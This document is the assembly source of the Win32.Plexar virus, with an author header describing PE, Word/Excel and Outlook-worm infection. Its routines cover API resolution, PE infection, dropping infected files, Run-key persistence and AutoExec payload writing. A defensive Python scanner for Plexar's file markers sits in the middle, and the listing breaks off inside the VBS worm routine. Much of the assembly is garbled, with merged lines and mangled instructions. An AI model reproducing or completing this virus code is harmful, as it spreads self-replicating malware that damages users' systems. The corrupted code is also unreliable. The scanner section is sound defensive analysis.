Win32


;==========================================================================
;                           [ Win32.Plexar ]
;
; Designed by LiteSys in Venezuela, South America.
;
; PE / DOC / XLS / Outlook multithreaded polymorphic direct-action infector.
;
; Welcome to Plexar, my latest code.
;
; It infects PE files by enlarging the last section. I don't overwrite the
; .reloc section, it's preferable to leave it alone. In fact, this virus
; avoids infecting some AV or Win32 files that should never be infected.
; This is done by CRC32 comparison.
;
; Infects Word and Excel documents by dropping (through VBScript) a macro
; module-infecting virus in the normal template and Personal.xls that is
; capable of dropping an infected PE file to the Windows directory and then
; running it.
;
; Distributes through electronic mail by dropping a VBS worm capable of
; sending infected droppers to every e-mail address in the Outlook address
; book. Sorry, but I didn't have any time to code a decent MAPI worm =(.
;
; The poly engine is another lame table-driven engine written by me =). No
; anti-AVer intentions were the reason to write this poly engine, just to
; conceal the code, so I think it doesn't deserve an explanation because
; the garbage is very lame.
;
; It runs the different routines (Word infection, VBS worm, direct action)
; in different threads. As I always said, I don't optimize my code too much.
;
; The payload is very funny and if you're from Venezuela I hope you
; appreciate it. It consists of dropping a simple COM file that displays
; some silly stuff in Spanish. It runs from AutoExec.bat but doesn't display
; the message until the following rule is met (this is a very kewl idea I
; learnt from Byway ;D):
;
;   if month <= 7: day = month^2 / 3 + 4
;   if month >= 8: day = month^2 / 5 - 4
;
; So the payload will run on every month (as a coincidence, the formula
; pointed to December 24th :P). It's not destructive, so don't black.
;
; This virus has lots of bugs, I've corrected many but still there are a
; lot. It was tested under Win95 (4.10.111), Win98 (4.10.1998), WinME and
; WinNT (4.0/SP4); the virus worked perfectly under those versions. I don't
; know about Win98 SE and Win2k, since I don't have them installed. I have
; the CDs here but I'm a lazy ass and my HD space is totally phuken.
;
; Virus size = 12 KB. Code not commented. Not even AVP or Norton (with
; their "high heuristic" Bloodhound shit) flagged the infected PEs,
; except Norton, which flagged the VBS worm.
;
; If you need to contact me you can use both mail addresses: litesys@monte.as
; or liteno2@softhome.net. Remember, for decent stuff.
;
; Patria o Muerte: Venceremos (Homeland or death: we shall win).
;
; LiteSys.
; Venezuela, July / August - (C) 2001
;==========================================================================

.586

.Model flat, stdcall

INCLUDE C: /TOOLS/TASM/include/win32api.inc

INCLUDE C: /TOOLS/TASM/include/windows.inc

EXTRN EXITPROCESS: PROC

EXTRN MessageBoxExa: Proc

.DATA

Debug Equias

EQU

By EQU

Wo Equ

DWO EQU

RDTSC EQU

Apicall Macro APIZ

Call DWORD PTR [APIZ EBP]

ENDM

Numero_paginas EQU 32H

K32_W9X EQU 0BFF70000H

GPA_W9X EQU 0BFF76DACH

Virus_Tama EQU (Termina_Plexar - Empieza_Plexar)

Titulo DB "plexar."

DB Virus_Tama / 10000 MOD 10 30H

DB Virus_Tama / 01000 MOD 10 30HDB Virus_TAMA  / 00100 MOD 10 30H

DB Virus_TAMA  / 00010 MOD 10 30H

DB Virus_TAMA  / 00001 Mod 10 30H

DB 00H

MENSAJE DB "Plexar (C) 2001 LiteSys"

DB "- Activado."

DB 00H

REG_SZ EQU <1>

HKEY_LOCAL_MACHINE EQU <80000002H>

.Code

Empieza_PLEXAR:

Call @delta

@Delta:

POP EAX

XCHG EBP, EAX

Sub ebp, offset @delta

JMP @@ 1

DB 00H, 00H, "[Plexar]", 00h, 00h

@@1:

Call @ SEH_1

MOV ESP, DWORD PTR [ESP 8h]

JMP @fuerahost

@ SEH_1:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

MOV EDI, DWORD PTR [ESP 8h]

Call busca_k32

Call busca_gpa

Lea ESI, OFS [CREATEFILEA]

Lea edi, OFS [APIS_K32]

MOV EBX, DWO [kernel32]

Call busca_apis

Lea Edx, OFS [RewTDir]

Push Edx

PUSH MAX_PATH

Apicall getCurrentDirectorya

OR EAX, EAX

JZ @Fuerahost

IF Debug

Push EBP

Call Directa

Push EBP

Call WORM_VBS

Push EBP

Call infecta_word

JMP @fuerahost

Else

Call Thread

ENDIF

Call Er_Pailon

@Fuerahost:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

Push 12345678H

Org $ -4

Hostback DD Offset Mentira

RET

;--------------------------------------------------------------------------
; Main thread: starts the other threads.

Thread Proc

Pushhad

And by [Listo_Directa], 00H

XOR EAX, EAX

Lea EBX, OFS [threeRead_directa]

Push EBX

Push EAX

Push EBP

LEA EBX, OFS [Directa]

Push EBX

Push EAX

Push EAX

Apicall CreateThread

Mov dwo [thread_directa], EAX

OR EAX, EAX

JZ @finthread

Push 02h

Push EAX

Apicall SetthreadPriority

@Revdirect:

Push -1

Push dwo [threeRead_directa]

Apicall WaitforsingleObject

CMP by [Listo_Directa], 01H

JNZ @revdirect

XOR EAX, EAX

Lea EBX, OFS [THREAD_WORMVBS] PUSH EBX

Push EAX

Push EBP

Lea EBX, OFS [WORM_VBS]

Push EBX

Push EAX

Push EAX

Apicall CreateThread

Mov dwo [thread_wormvbs], EAX

OR EAX, EAX

JZ @finthread

Push 02h

Push EAX

Apicall SetthreadPriority

XOR EAX, EAX

Lea EBX, OFS [thread_iword]

Push EBX

Push EAX

Push EBP

Lea ebx, OFS [infecta_word]

Push EBX

Push EAX

Push EAX

Apicall CreateThread

Mov dwo [thread_iword], EAX

OR EAX, EAX

JZ @finthread

Push 02h

Push EAX

Apicall SetthreadPriority

Push -1

Push True

Lea Eax, OFS [Thread_Wormvbs]

Push EAX

Push 02h

Apicall WaitFormultiPleObjects

@Finthread:

Popad

RET

Thread Endp

;--------------------------------------------------------------------------
; Payload.

Er_Pailon Proc

Pushhad

CDQ

Push Edx

Push file_attribute_normal

Push Create_New

Push Edx

Push Edx

Push generic_write

Lea Eax, OFS [Cocofrio]

Push EAX

Apicall Createfilea

Mov DWO [Pfhandle], EAX

INC EAX

JZ @P_fin

Dec EAX

XCHG EBX, EAX

XOR EDX, EDX

Push Edx

Lea Eax, OFS [PTEMPORAL]

Push EAX

Push largo_pprog

Lea Eax, OFS [payload_prog]

Push EAX

Push EBX

Apicall Writefile

OR EAX, EAX

JZ @P_fin

Push dwo [pfhandle]

Apicall CloseHandle

CDQ

Push Edx

Push file_attribute_normal

Push Open_EXISTING

Push Edx

Push Edx

Push generic_write

Lea Eax, OFS [AutoExec]

Push EAX

Apicall Createfilea

Mov DWO [Pfhandle], EAX

INC EAX

JZ @P_fin

Dec EAX

CDQ

Push 00000002H

Push Edx

Push Edx

Push EAX

Apicall setFilePointer

CDQ

Push Edx

Lea Eax, OFS [PTEMPORAL]

Push EAX

Push largo_cocofrio-1

Lea Eax, OFS [Cocofrio]

Push EAX

Push dwo [pfhandle]

Apicall Writefile

OR EAX, EAX

JZ @P_fin

Push dwo [pfhandle]

Apicall CloseHandle

@P_fin:

Popad

RET

Er_Pailon ENDP

;--------------------------------------------------------------------------

Busca_k32 proc

And EDI, 0FFFFFFFF0000h

Push numero_paginas

POP ECX

@ Compara_k32:

Push EDI

MOV BX, Word PTR [EDI]

OR BX, 03D5BH; 5A4D || 3D5B == 7F5F

SUB BX, 07F5FH

JNZ @ incrementa_k32

Add Edi, [EDI 3CH]

MOV BX, Word PTR [EDI]; 4550 && C443 == 4440

And bx, 0c443h

XOR BX, 04440H

JE @Enk32

@ Increea_k32:

POP EDI

Sub EDI, 10000H

Loop @ Compara_k32

Push K32_W9x

@Enk32:

POP DWO [kernel32]

RET

Busca_k32 endp

;--------------------------------------------------------------------------

DB 5 DUP (90h)

; Routine to locate GetProcAddress.

Busca_gpa proc

MOV EBX, DWO [kernel32]

MOV EDI, EBX

Add Edi, DWORD PTR [EDI 3CH]

Mov EDI, DWORD PTR [EDI 78H]

Add Edi, EBX

Mov dwo [exports], EDI

MOV ECX, DWORD PTR [EDI 18H]

Dec ECX

MOV EDI, DWORD PTR [EDI 20H]

Add Edi, EBX

XOR EAX, EAX

@ BGPA_1:

MOV ESI, DWORD PTR [EDI]

Add ESI, EBX

Push EDI

Push L_GetProcaddress

POP EDI

Pushhad

Call CRC32

CMP EAX, CRC32_GETPROCADDRESS

Popad

POP EDI

JE @ BGPA_2

INC EAX

Add Edi, 4H

Loop @ BGPA_1

PUSH GPA_W9X

JMP @ BGPA_3

@ BGPA_2:

Mov ESI, DWO [EXPORTS]

Add Eax, EAX

Mov EDI, DWORD PTR [ESI 24h]

Add Edi, EBX

Add Edi, EAX

Movzx Eax, Word PTR [EDI]

Imul Eax, 4h

MOV EDI, DWORD PTR [ESI 1CH]

Add Edi, EBX

Add Edi, EAX

MOV EAX, DWORD PTR [EDI]

Add Eax, EBX

Push EAX

@ BGPA_3:

POP dwo [getProcaddress]

RET

Busca_gpa endp

;--------------------------------------------------------------------------
; ESI -> where to store the API addresses
; EDI -> API name strings
; EBX -> module
;
; Routine to look up the APIs.

Busca_apis proc

Pushhad

Mov Dwo [Guardalo], ESI

XCHG EDI, ESI

@ Ba1:

Lea edi, OFS [TEMPAPI] @ ba2:

CMP Byte PTR [ESI], 00H

JE @ ba4

Lodsb

CMP Al, 0EH

Ja @ ba3

XOR ECX, ECX

XCHG CL, Al

PUSH ESI

Lea ESI, OFS [PACKEDAPIS]

@ Ba5:

Inc ESI

CMP Byte PTR [ESI], 00H

JNZ @ ba5

Loop @ ba5

Inc ESI

@ Ba6:

Movsb

CMP Byte PTR [ESI], 00H

JNZ @ ba6

POP ESI

JMP @ ba2

@ Ba3:

Stosb

JMP @ ba2

@ Ba4:

XOR Al, Al

Stosb

Lea Eax, OFS [TempaPi]

Push EAX

Push EBX

Call [getProcadDress EBP]

NOP

PUSH ESI

Mov ESI, 12345678H

Org $ -4

Guardalo DD 00000000H

Mov DWORD PTR [ESI], EAX

Add dwo [Guardalo], 00000004H

POP ESI

Inc ESI

CMP Byte Ptr [ESI], 0FFH

JNZ @ ba1

@ OA7:

Popad

RET

Busca_apis endp

;--------------------------------------------------------------------------
; Direct action.

Directa Proc Pascal DeltaOfs: DWORD

Pushhad

Mov EBP, Deltaofs

Call @ seh_2

MOV ESP, DWORD PTR [ESP 8h]

JMP @dirf

@ SEH_2:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Lea Edx, OFS [RewTDir]

Push Edx

Apicall setCurrentDirectorya

OR EAX, EAX

JZ @dirf

@ Dir1:

Lea Eax, OFS [BusQueda]

Push EAX

Lea Eax, OFS [Mascara]

Push EAX

Apicall FindfirstFilea

Mov dwo [bhandle], EAX

INC EAX

JZ @ Dir2

@ Dir3:

Lea edi, OFS [busqueda.wfd_szfilename]

MOV EBX, EDI

Push EBX

XOR Al, Al

Scasb

JNZ $ -1

XCHG ESI, EDI

SUB ESI, 5H

OR DWORD PTR [ESI], 20202020H

Mov EDI, 5H

Call CRC32

POP EBX

CMP Eax, CRC_EXE; .exe CRC32

JE @infecta_este_exe

CMP EAX, CRC_SCR ;.SCR CRC32

JE @infecta_este_exe

@Retorna_directa:

Lea Eax, OFS [BusQueda]

Push EAX

Push dwo [bhandle]

Apicall FindnextFilea

OR EAX, EAX

JNZ @ DIR3

Push dwo [bhandle]

Apicall FindClose

@ Dir2:

Lea Eax, OFS [Puto_Puto]

Push EAX

Apicall setCurrentDirectorya

Lea Eax, OFS [busqueda.wfd_szfilename]

Push EAX

PUSH MAX_PATH

Apicall getCurrentDirectorya

CMP EAX, DWO [LARGPP]

JZ @dirf

Mov dwo [larpp], EAX

JMP @ Dir1

Lea Eax, OFS [Rewtdir]

Push EAX

Apicall setCurrentDirectorya

@Dirf:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

IF Debug

Popad

RET

Else

Inc by [Listo_directa]

Mov dwo [Guardaebp], EBP

Popad

Mov EBX, 12345678H

Org $ -4

Guardaebp DD 00000000H

Push null

Call [EBX EXITTHREAD]

RET

ENDIF

@Infecta_este_exe:

Call infecta_pe

JMP @retorna_directa

Directa ENDP

;--------------------------------------------------------------------------
; Routine to infect a PE.
;
; EBX -> file to infect

Infecta_pe proc

Pushhad

Push dwo [Hostback]

POP dwo [Guarda_eip]

Call @seh_ipe

MOV ESP, [ESP 8h]

JMP @pef

@Seh_ipe:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Push 019D

POP ECX

MOV ESI, EBX

Lea edx, OFS [crcnoinf]

@CICLONO:

Push 04h

POP EDI

Push EBX

PUSH ESI

Push Edx

Push ECX

Call CRC32

POP ECX

POP EDX

POP ESI

POP EBX

CMP EAX, DWORD PTR [EDX]

JZ @pef

Add Edx, 4H

Loop @ciclono

Push 00000000H

Push EBX

Apicall setFileAttributesa

XOR EAX, EAX

Push EAX

Push 00000000H

Push Open_EXISTING

Push EAX

Push EAX

Push generic_read generic_write

Push EBX

Apicall Createfilea

Mov dwo [fhandle], EAX

INC EAX

JZ @pef

Dec EAX

Push null

Push EAX

Apicall getFileSize

Mov DWO [Tama_1], EAX

INC EAX

JZ @pe_close

Dec EAX

CMP EAX, 8192D

JB @pe_close

Add Eax, Virus_TAMA  1400H

Mov dwo [tama_2], EAX

XOR EDX, EDX

Push Edx

Push EAX

Push Edx

Push Page_Readwrite

Push Edx

Push dwo [fhaandle]

Apicall CreateFilemappingA

Mov dwo [Mhaldle], EAX

OR EAX, EAX

JZ @pe_close

XOR EDX, EDX

Push dwo [tama_2]

Push Edx

Push Edx

Push file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap], EAX

OR EAX, EAX

JZ @pe_closemap

Mov Edi, EAX

MOV BX, Word PTR [EDI]

And bx, 3ed4h; "zm" = 5A4DH ^ 3ed4h == 1444H

Add BX, BX

XOR BX, 3488H

JNZ @pe_unmap

MOV EBX, DWORD PTR [EDI 3CH]

Add ebx, EDI

CMP EBX, DWO [BASEMAP]

JB @pe_unmap

Mov Edx, Dwo [BaseMap]

Add Edx, Dwo [Tama_1]

CMP EBX, EDX

Ja @pe_unmap

Add Edi, [EDI 3CH]

MOV BX, Word PTR [EDI]

OR BX, 0AEDAH; "EP" = 4550h | 0AEDAH == 0efdah

SUB BX, 0EFDAH

JNZ @pe_unmap

MOV ESI, EDI

Pushhad

Add ESI, 4CH

Mov EDI, 5H

Call CRC32

CMP EAX, CRC_PLXR

Popad

JE @pe_unmap

Mov Eax, "RXLP" xor 0c3e8f2a8h

XOR Eax, 0c3e8f2a8h

MOV DWORD PTR [EDI 4CH], EAX

Add ESI, 18H

Movzx Eax, Word PTR [EDI 14H]

Add ESI, ESI

XOR EDX, EDX

Movzx EDX, Word PTR [EDI 06H]

Dec edx

Imul EDX, 28H

Add ESI, EDX

OR DWORD PTR [ESI 24h], 0A0000020H

MOV EAX, DWORD PTR [ESI 08H]

Push EAX

Add Eax, Virus_TAMA  400H

Mov DWORD PTR [ESI 08H], EAX

MOV EBX, DWORD PTR [EDI 3CH]

XOR EDX, EDX

Div EBX

INC EAX

Mul EBX

Mov DWORD PTR [ESI 10H], EAX

MOV EAX, DWORD PTR [ESI 10h]

Add Eax, DWORD PTR [ESI 0CH]

MOV DWORD PTR [EDI 50H], ​​EAX

POP EDX

Mov Eax, DWORD PTR [EDI 28H]

Add Eax, DWORD PTR [EDI 34H]

Mov dwo [Hostback], EAX

Add Edx, DWORD PTR [ESI 0CH]

MOV DWORD PTR [EDI 28H], EDX

Push EBP

Push EBX

Inc ESP

POP EBX; /

DEC ESP; /

Push EBX ; > "[Lsx]" executable string.

POP EAX; /

POP EBP; /

MOV EDI, DWORD PTR [ESI 14H]

Add Edi, DWORD PTR [ESI 08H]

Add Edi, DWO [BaseMap]

Mov ECX, Virus_Tama / 4Sub EDI, Virus_TAMA 400H

Lea ESI, OFS [EMPIEZA_PLEXAR]

Call PXPE

Push dwo [tama_2]

POP DWO [Tama_1]

@PE_UNMAP:

XOR EAX, EAX

Push EAX

Push EAX

Push dwo [tama_1]

Push dwo [fhaandle]

Apicall setFilePointer

Push dwo [fhaandle]

Apicall setndoffile

Push dwo [BaseMap]

Apicall unmapViewoffile

@PE_Closemap:

Push dwo [mhandle]

Apicall CloseHandle

@PE_Close:

Push dwo [fhaandle]

Apicall CloseHandle

@Pef:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

Push dwo [Guarda_eip]

POP DWO [HostBack]

Popad

RET

Infecta_pe endp
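From a defender's point of view, the routine above leaves three static traces in a host that a scanner can look for without executing anything: the 4-byte mark written into the reserved Win32VersionValue field of the optional header (offset 4Ch from the PE signature; the PE specification requires this field to be zero), the last section's characteristics OR'd with 0A0000020h (code, executable, writable), and an entry point moved into that enlarged last section. The Python below is an added detection example, not part of the Plexar listing and not code by its author. It assumes that TASM stores the literal "RXLP" little-endian, so the bytes on disk read "PLXR", and it compares only those four bytes (the listing's own CRC check covers five). The two PE images it scans are constructed inline for the test and are not real binaries.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# The listing ORs exactly these three bits into the last section header.
PLEXAR_SECTION_BITS = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE  # 0xA0000020
# Assumption: TASM stores "RXLP" little-endian, so the file bytes read "PLXR".
PLEXAR_MARKER = b"PLXR"


def scan_pe(data: bytes) -> dict:
    """Return the static Plexar indicators found in a PE image held in memory."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x18 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 0x06)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    if num_sections == 0 or opt_size < 0x60:
        raise ValueError("malformed headers")
    entry_rva = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]
    # Win32VersionValue (optional header + 0x34) is reserved and must be zero;
    # the infector stamps its marker there.
    marker = data[e_lfanew + 0x4C:e_lfanew + 0x50] == PLEXAR_MARKER
    last_hdr = e_lfanew + 0x18 + opt_size + (num_sections - 1) * 0x28
    if last_hdr + 0x28 > len(data):
        raise ValueError("section table truncated")
    vsize, vaddr, rawsize = struct.unpack_from("<III", data, last_hdr + 0x08)
    chars = struct.unpack_from("<I", data, last_hdr + 0x24)[0]
    rwx_last = (chars & PLEXAR_SECTION_BITS) == PLEXAR_SECTION_BITS
    ep_in_last = vaddr <= entry_rva < vaddr + max(vsize, rawsize)
    return {
        "marker": marker,
        "rwx_last_section": rwx_last,
        "entry_in_last_section": ep_in_last,
        # The marker alone is conclusive for this family; the other two
        # together are the generic "code appended to last section" heuristic.
        "suspicious": marker or (rwx_last and ep_in_last),
    }


def build_sample_pe(infected: bool) -> bytes:
    """Constructed two-section PE32 image (not a real binary) for exercising scan_pe."""
    e_lfanew = 0x40
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x2100 if infected else 0x1000)  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)                         # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)                   # Section/File alignment
    if infected:
        opt[0x34:0x38] = PLEXAR_MARKER                                   # Win32VersionValue
    struct.pack_into("<II", opt, 0x38, 0x3000, 0x200)                   # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                                # NumberOfRvaAndSizes
    last_chars = 0xC0000040 | (PLEXAR_SECTION_BITS if infected else 0)
    sections = (
        struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
        + struct.pack("<8sIIIIIIHHI", b".data", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, last_chars)
    )
    image = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sections
    return image.ljust(0x600, b"\0")


if __name__ == "__main__":
    for label, sample in (("clean", build_sample_pe(False)), ("infected", build_sample_pe(True))):
        print(label, scan_pe(sample))
```

To run it over real files, read each candidate with `open(path, "rb").read()` and pass the bytes to `scan_pe`; the marker check is specific to this family, while the last-section heuristic also fires on other appending infectors and on some packers, so treat it as a triage signal rather than a verdict.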

;--------------------------------------------------------------------------
; This routine drops an empty PE file to disk.
;
; EBX -> name

Droppear_pe proc

Pushhad

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_Always

Push EAX

Push EAX

Push generic_read generic_write

Push EBX

Apicall Createfilea

Mov dwo [fhandle_dpe], EAX

INC EAX

JZ @fin_dpe

Dec EAX

XOR EBX, EBX

Push EBX

Push 32768d

Push EBX

Push Page_Readwrite

Push EBX

Push EAX

Apicall CreateFilemappingA

MOV DWO [MHANDLE_DPE], EAX

OR EAX, EAX

JZ @DPE_CIERRA

XOR EBX, EBX

Push 32768d

Push EBX

Push EBX

Push file_map_write

Push EAX

Apicall MapViewOffile

MOV DWO [BaseMap_DPE], EAX

OR EAX, EAX

JZ @dpe_cierramap

Push EAX

Lea Eax, OFS [Dropper]

Push EAX

Call _ap_depack_asm

Add ESP, 08H

XOR EBX, EBX

Push EBX

Push EBX

Push EAX

Push dwo [fhandle_dpe]

Apicall setFilePointer

@DPE_Desmapea:

Push dwo [BaseMap_DPE]

Apicall unmapViewoffile

@DPE_CIERRAMAP:

Push dwo [mhandle_dpe]

Apicall CloseHandle

@DPE_CIERRA:

Push dwo [fhandle_dpe]

Apicall setndoffile

Push dwo [fhandle_dpe]

Apicall CloseHandle

Popad

RET

@Fin_dpe:

Popad

STC

RET

Droppear_pe endp

DB 00h, 00h

DB ""

DB 00h, 00h

DB "[hecho en venezuela]"

DB 00h, 00h

;--------------------------------------------------------------------------
; Routine to drop the Word macro virus.

Infecta_word Proc Pascal DeltaOfs: DWORD

Pushhad

Mov EBP, Deltaofs

Call @ SEH_3

MOV ESP, DWORD PTR [ESP 8h]

JMP @iw_fin

@ SEH_3:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

PUSH MAX_PATH

Push null

Apicall VirtualaLloc

MOV DWO [VFREEZ], EAX

OR EAX, EAX

JZ @iw_fin

PUSH MAX_PATH

Push EAX

Apicall getWindowsDirectorya

OR EAX, EAX

JZ @iw_fin

Push dwo [vfreez]

Apicall setCurrentDirectorya

OR EAX, EAX

JZ @iw_fin

Push Mem_Decommit

PUSH MAX_PATH

Push 12345678H

Org $ -4

VFreez DD 00000000H

Apicall VirtualFree

Lea EBX, OFS [WScript_exe]

Call @existe_archivo

JNC @vbs_fin

Lea EBX, OFS [Raxelp _ $$$]

Call @existe_archivo

JC @iw_fin

Lea Edi, OFS [Macaco]

Push 08h

POP ECX

@ IW2:

Push 25D

POP EBX

Call Random

Add Eax, 65D

Stosb

Loop @ IW2

MOV EAX, "$$$."

Stosd

XOR Al, Al

Stosb

Lea EBX, OFS [Macaco]

Call Droppear_pe

JC @iw_fin

Lea EBX, OFS [Macaco]

Call infecta_pe

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Open_EXISTING

Push EAX

Push EAX

Push generic_read generic_write

Lea Eax, OFS [Macaco]

Push EAX

Apicall Createfilea

Mov dwo [fhandle_iw], EAX

INC EAX

JZ @iw_fin

Dec EAX

Push null

Push EAX

Apicall getFileSize

MOV DWO [Tama_iw], EAX

INC EAX

JZ @iw_cierrafile

XOR EAX, EAX

Push EAX

Push EAX

Push EAX

Push Page_Readwrite

Push EAX

Push dwo [fhandle_iw] APICALL CREATEFILEMAPPINGA

Mov dwo [Mhaldle], EAX

OR EAX, EAX

JZ @iw_cierrafile

XOR EBX, EBX

Push EBX

Push EBX

Push EBX

Push file_map_read file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap_iw], EAX

OR EAX, EAX

JZ @iw_cierramap

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

Mov Eax, Dwo [Tama_iw]

Add Eax, EAX

Add Eax, 1000H

Push EAX

Push null

Apicall VirtualaLloc

Mov DWO [Memoria_iw], EAX

OR EAX, EAX

JZ @iw_fin

MOV ECX, DWO [Tama_iw]

Mov Edi, EAX

Mov ESI, DWO [Basemap_iw]

@Conve:

Lodsb

Call @Hexa

Stosw

Loop @conve

XOR EAX, EAX

Stosd

Push dwo [basemap_iw]

Apicall unmapViewoffile

Push dwo [mhandle_iw]

Apicall CloseHandle

Push dwo [fhandle_iw]

Apicall CloseHandle

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_New

Push EAX

Push EAX

Push generic_read generic_write

Lea Eax, OFS [Raxelp _ $$$]

Push EAX

Apicall Createfilea

Mov dwo [fhandle_iw], EAX

INC EAX

JZ @iw_fin

Dec EAX

XOR EBX, EBX

Push EBX

Push 131072D

Push EBX

Push Page_Readwrite

Push EBX

Push EAX

Apicall CreateFilemappingA

Mov dwo [Mhandle_iw], EAX

OR EAX, EAX

JZ @iw_cierrafile

XOR EBX, EBX

Push EBX

Push EBX

Push EBX

Push file_map_read file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap_iw], EAX

OR EAX, EAX

JZ @iw_cierramap

Mov Edi, EAX

Lea ESI, OFS [Virus_Macro]

Push l_virus_macro

POP ECX

REP MOVSB

Mov ESI, DWO [MEMORIA_IW]

XOR EDX, EDX

XOR EAX, EAX

@Iw_b:

Movsb

Inc EDX

CMP EDX, 200D

JNZ @iw_d

MOV Al, '""

Stosb

MOV AX, 0A0DH

Stosw

Mov Eax, "ADOJ"

Stosd

MOV EAX, 'J ='

Stosd

MOV EAX, "ADO"

Stosd

MOV AX, " "

Stosw

MOV Al, '""

Stosb

; JODA = JODA "

XOR EAX, EAX

XOR EDX, EDX

@Iw_d:

CMP Byte PTR [ESI], Al

JNZ @iw_b

MOV Al, '""

Stosb

MOV AX, 0A0DH

Stosw

Lea ESI, OFS [Virus_Macro_2]

Push l_virus_macro_2

POP ECX

REP MOVSB

Push dwo [basemap_iw]

Apicall unmapViewoffile

Push dwo [mhandle_iw]

Apicall CloseHandle

Sub EDI, DWO [BaseMap_iw]

XOR EBX, EBX

Push EBX

Push EBX

Push EDI

Push dwo [fhandle_iw]

Apicall setFilePointer

Push dwo [fhandle_iw]

Apicall setndoffile

Push dwo [fhandle_iw]

Apicall CloseHandle

Push Mem_Decommit

Mov Eax, Dwo [Tama_iw]

Add Eax, EAX

Add Eax, 1000H

Push EAX

Push dwo [Memoria_iw]

Apicall VirtualFree

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_Always

Push EAX

Push EAX

Push generic_write

Lea EBX, OFS [PLXWRD_VBS]

Push EBX

Apicall Createfilea

Mov dwo [fhandle], EAX

INC EAX

JZ @iw_fin

Dec EAX

XOR EBX, EBX

Push EBX

Lea edx, OFS [scriptum]

Push Edx

Push largo_mvbs

Lea edx, OFS [macro_vbs]

Push Edx

Push EAX

Apicall Writefile

Push dwo [fhandle_iw]

Apicall CloseHandle

Call @iw_q

DB "shlwapi.dll", 00h

@Iw_q: Apicall LoadLibrarya

OR EAX, EAX

JZ @iw_fin

Call @iw_k

DB "SHSETVALUEA", 00h

@Iw_k: push eax

Apicall getProcAddress

OR EAX, EAX

JZ @iw_fin

Push 11D

Lea EBX, OFS [PLXWRD_VBS]

Push EBX

Push reg_sz

Call @iw_l

DB "plexar", 00h

@Iw_l: Call @iw_m

DB "Software / Microsoft / Windows / CurrentVersion / Run", 00H

@IW_M: Push HKEY_LOCAL_MACHINE

Call EAX

@Iw_fin:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

IF Debug

Popad

RET

Else

Mov dwo [Guardaebp2], EBP

Popad

MOV EBX, 12345678HORG $ -4

Guardaebp2 DD 00000000H

Push null

Call [EBX EXITTHREAD]

RET

ENDIF

@Iw_cierramap:

Push dwo [mhandle_iw]

Apicall CloseHandle

@Iw_cierrafile:

Push dwo [fhandle_iw]

Apicall CloseHandle

JMP @iw_fin

; Converts a number to its ASCII representation in hex.

@Hexa:

Push ECX

Push EDI

XOR ECX, ECX

MOV CL, Al

Push ECX

SHR CL, 04H

Lea Edi, OFS [Tabla_hex]

INC CL

@@ y:

Inc EDI

Deccl

JNZ @@ y

Dec Edi

Mov Al, Byte PTR [EDI] ; fetch the exact digit from the table

POP ECX

And Cl, 0FH

Lea Edi, OFS [Tabla_hex]

INC CL

@@ x:

Inc EDI

Deccl

JNZ @@ x

Dec Edi

Mov Ah, Byte PTR [EDI] ; fetch the exact digit from the table

POP EDI

POP ECX

RET 00H

Infecta_word endp

;--------------------------------------------------------------------------

WORM_VBS Proc Pascal DeltaOfs: DWORD

Pushhad

Mov EBP, Deltaofs

Call @ SEH_4

MOV ESP, DWORD PTR [ESP 8h]

JMP @vbs_fin

@ SEH_4:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

PUSH MAX_PATH

Push null

Apicall VirtualaLloc

MOV DWO [VFREEX], EAX

OR EAX, EAX

JZ @vbs_fin

PUSH MAX_PATH

Push EAX

Apicall getWindowsDirectorya

OR EAX, EAX

JZ @vbs_fin

Push dwo [vfreex]

Apicall setCurrentDirectorya

OR EAX, EAX

JZ @vbs_fin

